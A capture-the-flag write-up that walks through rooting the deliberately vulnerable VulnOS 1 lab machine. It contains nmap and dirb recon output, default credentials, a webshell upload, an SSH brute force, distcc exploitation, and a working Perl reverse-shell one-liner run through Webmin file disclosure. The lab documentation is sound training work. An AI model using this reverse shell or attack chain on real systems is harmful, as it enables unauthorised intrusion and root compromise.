This post describe the necessary steps to gain root in VulnOS 1, available on Vulnhub (https://www.vulnhub.com/). The goal of this box, according to the autor c4b3rw0lf (https://twitter.com/c4b3rw0lf), is to get root and find all the vulnerabilities inside the OS.
Machine Name: VulnOS: 1
Resource URL: https://www.vulnhub.com/entry/vulnos-1,60/
Release Data: 22 Mar 2014
Summary
To obtain administrative access in this box, the follow kill chain have been executed.
- Enumeration of open TCP ports and services.
- Detect a vulnerability in MiniServ allowing Arbitrary File Disclosure ( https://www.exploit-db.com/exploits/2017 ).
- Enumeration of open UDP ports, services and SNMP traps.
- The phpmyadmin allowed the attaker to access the databases and obtain encripted passwords.
- Cracking the password from user Drupal6 and get administrative access to Drupal6 management console.
- Arbitrary file upload in the Drupal6 platform after the attacker edit the ACL for safe file extensions. The file uploaded to the target system allow the attacker to gain a shell in the system.
- Using the credential found in /etc/ldap.secret, the attacker execute a bruteforce attack agaibst the SSH service, using the usernames in /etc/passwd. The attack revealed a valid credential for user vulnosadmin.
- The sudo is enabled to user vulnosadmin without restrictions to execute commands, allowing the attacker to get root access.
Another way to get administrative access in the machine is:
- Locate the service distccd and exploit ( https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec ) the service to gain a non privilegied shell in the target system.
- The attacker identified the service MiniServ 0.01 running under root privileges. The attacker combine the Arbitrary File Disclosure to make the target application execute a CGI script. When the CGI script runs, the attacker receive a shell with root privileges.
WriteUp
Recon
During the recon step, the portscanner nmap was used to enumerate open TCP ports and services. Multiples services has been detected running in the target system.
# Nmap 7.60 scan initiated Sun Feb 9 13:11:19 2020 as: nmap -sS -sV -sC -oN nmap_scan -v --mtu 64 192.168.1.114
Nmap scan report for VulnOS.lan (192.168.1.114)
Host is up (0.0053s latency).
Not shown: 977 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.3p1 Debian 3ubuntu7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 43:a6:84:8d:be:1a:ee:fb:ed:c3:23:53:14:14:8f:50 (DSA)
|_ 2048 30:1d:2d:c4:9e:66:d8:bd:70:7c:48:84:fb:b9:7b:09 (RSA)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
|_smtp-commands: VulnOS.home, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
| ssl-cert: Subject: commonName=VulnOS.home
| Issuer: commonName=VulnOS.home
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2014-03-09T14:00:56
| Not valid after: 2024-03-06T14:00:56
| MD5: fab2 dc38 f81d 7da1 474f 7327 417b 60ed
|_SHA-1: c182 f6e0 08cd 690a ad74 42c2 efaf ed7d 78c8 2b92
|_ssl-date: 2020-02-09T16:10:36+00:00; -1m42s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
|_ SSL2_DES_192_EDE3_CBC_WITH_MD5
53/tcp open domain ISC BIND 9.7.0-P1
| dns-nsid:
|_ bind.version: 9.7.0-P1
80/tcp open http Apache httpd 2.2.14 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.14 (Ubuntu)
|_http-title: index
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: SASL CAPA STLS UIDL RESP-CODES TOP PIPELINING
| ssl-cert: Subject: commonName=VulnOS.home
| Issuer: commonName=VulnOS.home
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2014-03-09T14:00:56
| Not valid after: 2024-03-06T14:00:56
| MD5: fab2 dc38 f81d 7da1 474f 7327 417b 60ed
|_SHA-1: c182 f6e0 08cd 690a ad74 42c2 efaf ed7d 78c8 2b92
|_ssl-date: 2020-02-09T16:10:34+00:00; -1m43s from scanner time.
| sslv2:
| SSLv2 supported
|_ ciphers: none
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/udp nfs
| 100005 1,2,3 48199/udp mountd
| 100005 1,2,3 57799/tcp mountd
| 100021 1,3,4 58737/udp nlockmgr
| 100021 1,3,4 59441/tcp nlockmgr
| 100024 1 35903/tcp status
|_ 100024 1 37113/udp status
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: LIST-EXTENDED LITERAL+ SASL-IR CONDSTORE completed Capability UNSELECT ENABLE IMAP4rev1 CONTEXT=SEARCH IDLE THREAD=REFERENCES I18NLEVEL=1 LOGINDISABLEDA0001 STARTTLS OK MULTIAPPEND WITHIN SEARCHRES QRESYNC SORT=DISPLAY THREAD=REFS ID ESORT ESEARCH LOGIN-REFERRALS UIDPLUS NAMESPACE CHILDREN SORT
| ssl-cert: Subject: commonName=VulnOS.home
| Issuer: commonName=VulnOS.home
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2014-03-09T14:00:56
| Not valid after: 2024-03-06T14:00:56
| MD5: fab2 dc38 f81d 7da1 474f 7327 417b 60ed
|_SHA-1: c182 f6e0 08cd 690a ad74 42c2 efaf ed7d 78c8 2b92
|_ssl-date: 2020-02-09T16:10:35+00:00; -1m43s from scanner time.
| sslv2:
| SSLv2 supported
|_ ciphers: none
389/tcp open ldap OpenLDAP 2.2.X - 2.3.X
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp open exec?
513/tcp open login?
514/tcp open tcpwrapped
901/tcp open http Samba SWAT administration server
| http-auth:
| HTTP/1.0 401 Authorization Required\x0D
|_ Basic realm=SWAT
| http-methods:
|_ Supported Methods: GET POST
|_http-title: 401 Authorization Required
993/tcp open ssl/imap Dovecot imapd
|_imap-capabilities: LIST-EXTENDED LITERAL+ SASL-IR CONDSTORE completed Capability UNSELECT ENABLE IMAP4rev1 OK IDLE THREAD=REFERENCES I18NLEVEL=1 AUTH=LOGINA0001 CONTEXT=SEARCH AUTH=PLAIN MULTIAPPEND WITHIN SEARCHRES QRESYNC SORT=DISPLAY THREAD=REFS ID ESORT ESEARCH LOGIN-REFERRALS UIDPLUS NAMESPACE CHILDREN SORT
| ssl-cert: Subject: commonName=VulnOS.home
| Issuer: commonName=VulnOS.home
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2014-03-09T14:00:56
| Not valid after: 2024-03-06T14:00:56
| MD5: fab2 dc38 f81d 7da1 474f 7327 417b 60ed
|_SHA-1: c182 f6e0 08cd 690a ad74 42c2 efaf ed7d 78c8 2b92
|_ssl-date: 2020-02-09T16:10:35+00:00; -1m43s from scanner time.
| sslv2:
| SSLv2 supported
|_ ciphers: none
995/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: SASL(PLAIN LOGIN) CAPA RESP-CODES UIDL USER TOP PIPELINING
| ssl-cert: Subject: commonName=VulnOS.home
| Issuer: commonName=VulnOS.home
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2014-03-09T14:00:56
| Not valid after: 2024-03-06T14:00:56
| MD5: fab2 dc38 f81d 7da1 474f 7327 417b 60ed
|_SHA-1: c182 f6e0 08cd 690a ad74 42c2 efaf ed7d 78c8 2b92
|_ssl-date: 2020-02-09T16:10:34+00:00; -1m43s from scanner time.
| sslv2:
| SSLv2 supported
|_ ciphers: none
2000/tcp open sieve Dovecot timsieved
2049/tcp open nfs 2-4 (RPC #100003)
3306/tcp open mysql MySQL 5.1.73-0ubuntu0.10.04.1
| mysql-info:
| Protocol: 10
| Version: 5.1.73-0ubuntu0.10.04.1
| Thread ID: 315
| Capabilities flags: 63487
| Some Capabilities: Support41Auth, Speaks41ProtocolNew, SupportsLoadDataLocal, IgnoreSpaceBeforeParenthesis, SupportsTransactions, IgnoreSigpipes, InteractiveClient, SupportsCompression, LongColumnFlag, Speaks41ProtocolOld, FoundRows, ODBCClient, DontAllowDatabaseTableColumn, LongPassword, ConnectWithDatabase
| Status: Autocommit
|_ Salt: }R_ipx+iO1DCdN8k5e}c
6667/tcp open irc IRCnet ircd
| irc-info:
| users: 1
| servers: 1
| chans: 15
| lusers: 1
| lservers: 0
| server: irc.localhost
| version: 2.11.2p1. irc.localhost 000A
| uptime: 0 days, 2:04:48
| source ident: NONE or BLOCKED
| source host: remember.lan
|_ error: Closing Link: ffsgpdypi[~nmap@remember.lan] ("")
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
| Supported Methods: GET HEAD POST PUT DELETE OPTIONS
|_ Potentially risky methods: PUT DELETE
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
10000/tcp open http MiniServ 0.01 (Webmin httpd)
|_http-favicon: Unknown favicon MD5: 1F4BAEFFD3C738F5BEDC24B7B6B43285
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
MAC Address: 08:00:27:43:06:19 (Oracle VirtualBox virtual NIC)
Service Info: Hosts: VulnOS.home, irc.localhost; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -1m42s, deviation: 0s, median: -1m43s
| nbstat: NetBIOS name: VULNOS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| VULNOS<00> Flags: <unique><active>
| VULNOS<03> Flags: <unique><active>
| VULNOS<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
|_ WORKGROUP<00> Flags: <group><active>
|_smb2-time: Protocol negotiation failed (SMB2)
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Feb 9 13:13:28 2020 -- 1 IP address (1 host up) scanned in 128.96 seconds
The nmap output reveals multiples services in the target system. The service MiniServ 0.01, running at port 10000/TCP has a Arbitrary File Disclosure vulnerability, and the exploit is public https://www.exploit-db.com/exploits/2017. The exploit allowed the attacker to access files like /etc/passwd, /etc/shadow from the target system.
The second scan has been executed against UDP services and detected that SNMP (https://en.wikipedia.org/wiki/Simple_Network_Management_Protocol) service is running and leaking information from the target system due to default configuration for the community.
# Nmap 7.60 scan initiated Wed Feb 26 07:36:28 2020 as: nmap -Pn -sU -sV -sC -oN udp-scan 192.168.1.142
Nmap scan report for VulnOS.lan (192.168.1.142)
Host is up (0.0047s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
68/udp open|filtered dhcpc
111/udp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/udp nfs
| 100005 1,2,3 47170/tcp mountd
| 100005 1,2,3 48269/udp mountd
| 100021 1,3,4 46204/tcp nlockmgr
| 100021 1,3,4 54221/udp nlockmgr
| 100024 1 37506/udp status
|_ 100024 1 57631/tcp status
137/udp open netbios-ns Microsoft Windows netbios-ns (workgroup: WORKGROUP)
138/udp open|filtered netbios-dgm
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info:
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: a2bd0a2e28cd1c53
| snmpEngineBoots: 29
|_ snmpEngineTime: 1h10m38s
| snmp-interfaces:
| lo
| IP address: 127.0.0.1 Netmask: 255.0.0.0
| Type: softwareLoopback Speed: 10 Mbps
| Traffic stats: 131.70 Kb sent, 131.70 Kb received
| eth0
| IP address: 192.168.1.142 Netmask: 255.255.255.0
| MAC address: 08:00:27:43:06:19 (Oracle VirtualBox virtual NIC)
| Type: ethernetCsmacd Speed: 10 Mbps
|_ Traffic stats: 590.54 Kb sent, 795.48 Kb received
| snmp-netstat:
| TCP 0.0.0.0:22 0.0.0.0:0
| TCP 0.0.0.0:23 0.0.0.0:0
| TCP 0.0.0.0:25 0.0.0.0:0
| TCP 0.0.0.0:110 0.0.0.0:0
| TCP 0.0.0.0:111 0.0.0.0:0
| TCP 0.0.0.0:143 0.0.0.0:0
| TCP 0.0.0.0:389 0.0.0.0:0
| TCP 0.0.0.0:512 0.0.0.0:0
| TCP 0.0.0.0:513 0.0.0.0:0
| TCP 0.0.0.0:514 0.0.0.0:0
| TCP 0.0.0.0:901 0.0.0.0:0
| TCP 0.0.0.0:993 0.0.0.0:0
| TCP 0.0.0.0:995 0.0.0.0:0
| TCP 0.0.0.0:2000 0.0.0.0:0
| TCP 0.0.0.0:2049 0.0.0.0:0
| TCP 0.0.0.0:3306 0.0.0.0:0
| TCP 0.0.0.0:3632 0.0.0.0:0
| TCP 0.0.0.0:6667 0.0.0.0:0
| TCP 0.0.0.0:8070 0.0.0.0:0
| TCP 0.0.0.0:10000 0.0.0.0:0
| TCP 0.0.0.0:46204 0.0.0.0:0
| TCP 0.0.0.0:47170 0.0.0.0:0
| TCP 0.0.0.0:57631 0.0.0.0:0
| TCP 127.0.0.1:53 0.0.0.0:0
| TCP 127.0.0.1:631 0.0.0.0:0
| TCP 127.0.0.1:953 0.0.0.0:0
| TCP 127.0.0.1:5432 0.0.0.0:0
| TCP 127.0.0.1:8069 0.0.0.0:0
| TCP 127.0.0.1:11211 0.0.0.0:0
| TCP 192.168.1.142:53 0.0.0.0:0
| UDP 0.0.0.0:68 *:*
| UDP 0.0.0.0:111 *:*
| UDP 0.0.0.0:137 *:*
| UDP 0.0.0.0:138 *:*
| UDP 0.0.0.0:161 *:*
| UDP 0.0.0.0:891 *:*
| UDP 0.0.0.0:2049 *:*
| UDP 0.0.0.0:10000 *:*
| UDP 0.0.0.0:35411 *:*
| UDP 0.0.0.0:37506 *:*
| UDP 0.0.0.0:48269 *:*
| UDP 0.0.0.0:54221 *:*
| UDP 127.0.0.1:53 *:*
| UDP 127.0.0.1:11211 *:*
| UDP 192.168.1.142:53 *:*
| UDP 192.168.1.142:137 *:*
|_ UDP 192.168.1.142:138 *:*
| snmp-processes:
| 1:
| Name: init
| Path: /sbin/init
| 2:
| Name: kthreadd
| 3:
| Name: migration/0
| 4:
| Name: ksoftirqd/0
| 5:
| Name: watchdog/0
| 6:
| Name: events/0
| 7:
| Name: cpuset
| 8:
| Name: khelper
| 9:
| Name: netns
| 10:
| Name: async/mgr
| 11:
| Name: pm
| 12:
| Name: sync_supers
| 13:
| Name: bdi-default
| 14:
| Name: kintegrityd/0
| 15:
| Name: kblockd/0
| 16:
| Name: kacpid
| 17:
| Name: kacpi_notify
| 18:
| Name: kacpi_hotplug
| 19:
| Name: ata/0
| 20:
| Name: ata_aux
| 21:
| Name: ksuspend_usbd
| 22:
| Name: khubd
| 23:
| Name: kseriod
| 24:
| Name: kmmcd
| 27:
| Name: khungtaskd
| 28:
| Name: kswapd0
| 29:
| Name: ksmd
| 30:
| Name: aio/0
| 31:
| Name: ecryptfs-kthrea
| 32:
| Name: crypto/0
| 37:
| Name: scsi_eh_0
| 38:
| Name: scsi_eh_1
| 40:
| Name: kstriped
| 41:
| Name: kmpathd/0
| 42:
| Name: kmpath_handlerd
| 43:
| Name: ksnapd
| 44:
| Name: kondemand/0
| 45:
| Name: kconservative/0
| 227:
| Name: scsi_eh_2
| 262:
| Name: kdmflush
| 266:
| Name: kdmflush
| 282:
| Name: usbhid_resumer
| 284:
| Name: jbd2/dm-0-8
| 285:
| Name: ext4-dio-unwrit
| 329:
| Name: upstart-udev-br
| Params: --daemon
| 331:
| Name: udevd
| Params: --daemon
| 492:
| Name: udevd
| Params: --daemon
| 498:
| Name: udevd
| Params: --daemon
| 516:
| Name: kpsmoused
| 636:
| Name: portmap
| 662:
| Name: smbd
| Params: -F
| 674:
| Name: rsyslogd
| Params: -c4
| 676:
| Name: dbus-daemon
| Params: --system --fork
| 711:
| Name: smbd
| Params: -F
| 715:
| Name: rpc.statd
| Params: -L
| 776:
| Name: flush-251:0
| 778:
| Name: getty
| Params: -8 38400 tty4
| 784:
| Name: getty
| Params: -8 38400 tty5
| 790:
| Name: getty
| Params: -8 38400 tty2
| 792:
| Name: getty
| Params: -8 38400 tty3
| 798:
| Name: getty
| Params: -8 38400 tty6
| 811:
| Name: named
| Params: -u bind
| 819:
| Name: cron
| 820:
| Name: atd
| 848:
| Name: mysqld
| 866:
| Name: postgres
| Params: -D /var/lib/postgresql/8.4/main -c config_file=/etc/postgresql/8.4/main/postgresql.conf
| 916:
| Name: postgres
| 917:
| Name: postgres
| 918:
| Name: postgres
| 919:
| Name: postgres
| 1138:
| Name: slapd
| Params: -h ldap:/// ldapi:/// -g openldap -u openldap -F /etc/ldap/slapd.d/
| 1158:
| Name: distccd
| Params: --pid-file=/var/run/distccd.pid --log-file=/var/log/distccd.log --daemon --allow 192.168.1.1/24 --listen 0.0.0.0 --nice 10 --zer
| 1168:
| Name: distccd
| Params: --pid-file=/var/run/distccd.pid --log-file=/var/log/distccd.log --daemon --allow 192.168.1.1/24 --listen 0.0.0.0 --nice 10 --zer
| 1175:
| Name: ircd
| 1178:
| Name: iauth
| 1181:
| Name: memcached
| Params: -m 64 -p 11211 -u nobody -l 127.0.0.1
| 1193:
| Name: rpciod/0
| 1230:
| Name: lockd
| 1233:
| Name: nfsd4
| 1234:
| Name: nfsd
| 1235:
| Name: nfsd
| 1237:
| Name: nfsd
| 1238:
| Name: nfsd
| 1239:
| Name: nfsd
| 1241:
| Name: nfsd
| 1242:
| Name: nfsd
| 1243:
| Name: nfsd
| 1249:
| Name: rpc.mountd
| Params: --manage-gids
| 1268:
| Name: inetd
| 1395:
| Name: master
| 1422:
| Name: snmpd
| Params: -Lsd -Lf /dev/null -u snmp -g snmp -I -smux -p /var/run/snmpd.pid -c /etc/snmp/snmpd.conf
| 1451:
| Name: python
| Params: ./openerp-server.py --config=/etc/openerp-server.conf
| 1460:
| Name: distccd
| Params: --pid-file=/var/run/distccd.pid --log-file=/var/log/distccd.log --daemon --allow 192.168.1.1/24 --listen 0.0.0.0 --nice 10 --zer
| 1471:
| Name: dovecot
| Params: -c /etc/dovecot/dovecot.conf
| 1474:
| Name: dovecot-auth
| 1482:
| Name: dovecot-auth
| Params: -w
| 1550:
| Name: nagios3
| Params: -d /etc/nagios3/nagios.cfg
| 1595:
| Name: cupsd
| Params: -C /etc/cups/cupsd.conf
| 1657:
| Name: apache2
| Params: -k start
| 1669:
| Name: apache2
| Params: -k start
| 1670:
| Name: apache2
| Params: -k start
| 1671:
| Name: apache2
| Params: -k start
| 1672:
| Name: apache2
| Params: -k start
| 1673:
| Name: apache2
| Params: -k start
| 1705:
| Name: java
| Params: -Djava.util.logging.config.file=/var/lib/tomcat6/conf/logging.properties -Djava.awt.headless=true -Xmx128M -XX:+UseConcMarkSweep
| 1742:
| Name: distccd
| Params: --pid-file=/var/run/distccd.pid --log-file=/var/log/distccd.log --daemon --allow 192.168.1.1/24 --listen 0.0.0.0 --nice 10 --zer
| 1743:
| Name: managesieve-log
| 1745:
| Name: managesieve-log
| 2098:
| Name: miniserv.pl
| Params: /var/www/webmin-1.280/miniserv.pl /etc/webmin/miniserv.conf
| 2100:
| Name: getty
| Params: -8 38400 tty1
| 2109:
| Name: dhclient3
| Params: -e IF_METRIC=100 -pf /var/run/dhclient.eth0.pid -lf /var/lib/dhcp3/dhclient.eth0.leases eth0
| 2130:
| Name: sshd
| Params: -D
| 2149:
| Name: pickup
| Params: -l -t fifo -u -c
| 2150:
| Name: qmgr
| Params: -l -t fifo -u
| 2173:
| Name: nmbd
| Params: -D
| 2757:
| Name: tlsmgr
| Params: -l -t unix -u -c
| 2928:
| Name: managesieve-log
| 2933:
| Name: apache2
| Params: -k start
| 3034:
| Name: pop3-login
| 3109:
| Name: pop3-login
| 3112:
| Name: imap-login
| 3113:
| Name: imap-login
| 3114:
| Name: imap-login
| 3115:
| Name: imap-login
| 3116:
| Name: imap-login
| 3117:
| Name: imap-login
| 3118:
| Name: imap-login
| 3119:
| Name: imap-login
| 3120:
| Name: imap-login
| 3121:
| Name: imap-login
| 3176:
|_ Name: pop3-login
| snmp-sysdescr: Linux VulnOS 2.6.32-57-generic-pae #119-Ubuntu SMP Wed Feb 19 01:20:04 UTC 2014 i686
|_ System uptime: 1h10m38.25s (423825 timeticks)
2049/udp open nfs 2-4 (RPC #100003)
10000/udp open webmin (http on TCP port 10000)
MAC Address: 08:00:27:43:06:19 (Oracle VirtualBox virtual NIC)
Service Info: Host: VULNOS; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: VULNOS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Feb 26 07:56:00 2020 -- 1 IP address (1 host up) scanned in 1171.40 seconds
The SNMP service allowed tha attacker to combine the previously Arbitrary File Disclosure vulnerability and the information colleted from SNMP server to enumerate the applications running in the target and their respective configuration files.
The recon against the port 80/TCP detected multiples platforms running in the same web server.
OUTPUT_FILE: ../dirb_scan_80
START_TIME: Sun Feb 9 19:27:51 2020
URL_BASE: http://192.168.1.114/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.114/ ----
==> DIRECTORY: http://192.168.1.114/imgs/
+ http://192.168.1.114/index (CODE:200|SIZE:745)
+ http://192.168.1.114/index.html (CODE:200|SIZE:745)
+ http://192.168.1.114/index2 (CODE:200|SIZE:1066)
==> DIRECTORY: http://192.168.1.114/javascript/
==> DIRECTORY: http://192.168.1.114/mediawiki/
==> DIRECTORY: http://192.168.1.114/phpldapadmin/
==> DIRECTORY: http://192.168.1.114/phpmyadmin/
==> DIRECTORY: http://192.168.1.114/phppgadmin/
==> DIRECTORY: http://192.168.1.114/javascript/jquery/
==> DIRECTORY: http://192.168.1.114/mediawiki/config/
==> DIRECTORY: http://192.168.1.114/mediawiki/extensions/
==> DIRECTORY: http://192.168.1.114/mediawiki/images/
==> DIRECTORY: http://192.168.1.114/mediawiki/skins/
==> DIRECTORY: http://192.168.1.114/phpldapadmin/css/
==> DIRECTORY: http://192.168.1.114/phpldapadmin/images/
+ http://192.168.1.114/phpldapadmin/index.php (CODE:200|SIZE:4731)
==> DIRECTORY: http://192.168.1.114/phpldapadmin/js/
==> DIRECTORY: http://192.168.1.114/phpmyadmin/js/
==> DIRECTORY: http://192.168.1.114/phpmyadmin/lang/
==> DIRECTORY: http://192.168.1.114/phpmyadmin/themes/
==> DIRECTORY: http://192.168.1.114/phppgadmin/classes/
==> DIRECTORY: http://192.168.1.114/phppgadmin/conf/
==> DIRECTORY: http://192.168.1.114/phppgadmin/help/
==> DIRECTORY: http://192.168.1.114/phppgadmin/images/
==> DIRECTORY: http://192.168.1.114/phppgadmin/lang/
==> DIRECTORY: http://192.168.1.114/phppgadmin/libraries/
+ http://192.168.1.114/phppgadmin/robots.txt (CODE:200|SIZE:221)
==> DIRECTORY: http://192.168.1.114/phppgadmin/sql/
==> DIRECTORY: http://192.168.1.114/phppgadmin/themes/
==> DIRECTORY: http://192.168.1.114/mediawiki/skins/common/
==> DIRECTORY: http://192.168.1.114/mediawiki/skins/disabled/
==> DIRECTORY: http://192.168.1.114/mediawiki/skins/simple/
==> DIRECTORY: http://192.168.1.114/phpldapadmin/css/default/
==> DIRECTORY: http://192.168.1.114/phpldapadmin/images/default/
==> DIRECTORY: http://192.168.1.114/phpmyadmin/themes/original/
==> DIRECTORY: http://192.168.1.114/phppgadmin/classes/database/
==> DIRECTORY: http://192.168.1.114/phppgadmin/classes/plugins/
==> DIRECTORY: http://192.168.1.114/phppgadmin/images/themes/
==> DIRECTORY: http://192.168.1.114/phppgadmin/libraries/adodb/
==> DIRECTORY: http://192.168.1.114/phppgadmin/themes/default/
==> DIRECTORY: http://192.168.1.114/mediawiki/skins/common/images/
==> DIRECTORY: http://192.168.1.114/phpmyadmin/themes/original/css/
==> DIRECTORY: http://192.168.1.114/phpmyadmin/themes/original/img/
==> DIRECTORY: http://192.168.1.114/phppgadmin/images/themes/default/
==> DIRECTORY: http://192.168.1.114/phppgadmin/libraries/adodb/drivers/
==> DIRECTORY: http://192.168.1.114/phppgadmin/libraries/adodb/lang/
==> DIRECTORY: http://192.168.1.114/mediawiki/skins/common/images/ar/
==> DIRECTORY: http://192.168.1.114/mediawiki/skins/common/images/de/
==> DIRECTORY: http://192.168.1.114/mediawiki/skins/common/images/fa/
==> DIRECTORY: http://192.168.1.114/mediawiki/skins/common/images/icons/
-----------------
END_TIME: Sun Feb 9 19:43:30 2020
DOWNLOADED: 212152 - FOUND: 25
The directory and files enumeration using the dirb tool revealed applications such: phpmyadmin,phpldapadmin, mediawiki and phppgadmin, running in the target under port 80/TCP. Tests against the phpmyadmin application located at http://192.168.1.114/phpmyadmin reveals that the user root is using toor as password. The common credential allowed the attacker to access the databases and collect information from the databases such as passwords and applications.
Inside the drupal6 database, the attacker found users passwords, the password is encrypted.
In order to crack the drupal6 password, the hash has been submitted to CrackStation (https://crackstation.net/), the crack service returns the password in clear text.
Exploitation Part 1
The drupal application has found at http://192.168.1.142/drupal6/ by guessing the directory. The attacker obtain administrative access in the drupal6 managemnt console using the cracked password. Inside the management console, the attacker is allowed to edit the Access Control List (or ACL ), adding new extensions in the whitelist for extensions allowed in the platform.
After add the phtml to the ACL, the attacker is allowed to upload a malicious php file to the platform and execute remote commands.
With the webshell placed in http://192.168.1.142/drupal6/sites/default/files/webshell.phtm, the attacker upload a reverse shell to the target system in order to gain a TTY shell in the system. After execute the reverse shell in the target system, the attacker machine received a shell under www-data (uid 33) privileges.
Privilege Escalation Part 1
In order to get more privileges in the target, the attacker found the /etc/ldap.secret file. This file has a password stored in clear text.
A bruteforce attack against SSH service, using the users found in /etc/passwd file in target system, identifies that the password canuhackme is valid to user vulnosadmin.
Using the credentials from vulnosadmin, the attacker is allowed to authenticate using the SSH service. The user vulnosadmin has sudo privileges without any restrictions to execute commands, allowing the attacker to obtain administrative access in the target machine.
Exploitation : Part 2
The snmp running in the target system reveal the distccd (https://en.wikipedia.org/wiki/Distcc) service running, this software contain a vulnerability (https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec) which allow the attacker to execute arbitrary commands on any system running distccd. To exploit this vulnerability the attacker use the metasploit module exploit/unix/misc/distcc_exec.
Privilege Escalation: Part 2
Has been identified that the webmin is running under root privileges. Combining this environment with the Arbitrary File Disclosure vulnerability, is possible to create a CGI file and execute using the exploit https://www.exploit-db.com/exploits/2017 to execute the CGI file, when the CGI file runs, it will runs with root privileges, this scenario can be exploited to obtain a reverse shell with root privielges.
The CGI file has been placed at /tmp/revshell.cgi under the www-data user.
#!/usr/bin/perl -w
use Socket;$i="192.168.1.144";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};
When the Arbitrary File Disclosure to reach the /tmp/revshell.cgi file, the script executes and connect back to the attacker machine with a shell under root privileges.
Conclusion
This box has a lot of services running, the enumeration and recon process need to be very good to not miss any point. I found others vulnerabilities in the server mostly related with enumeration. Of course I’m disconsiderring services like DVWA. I try a lote more of hacks in this box, the SSH si vulnerable to user enumeration, the SMTP is vulnerable to user enumeration. I will not report this here because I think is not something really important to own the box.
This box make me speend time, but is really nice the way we abuse the service Webmin which run under root privileges, the CGI script is a really nice hack.
Resources
- CrackStation: https://crackstation.net/
- Distcc Exec: https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec
- Arbitrary File Disclosure: https://www.exploit-db.com/exploits/2017
- Distcc: https://en.wikipedia.org/wiki/Distcc
- Writeup: https://naveen194.blogspot.com/2016/10/vulnos-solution.html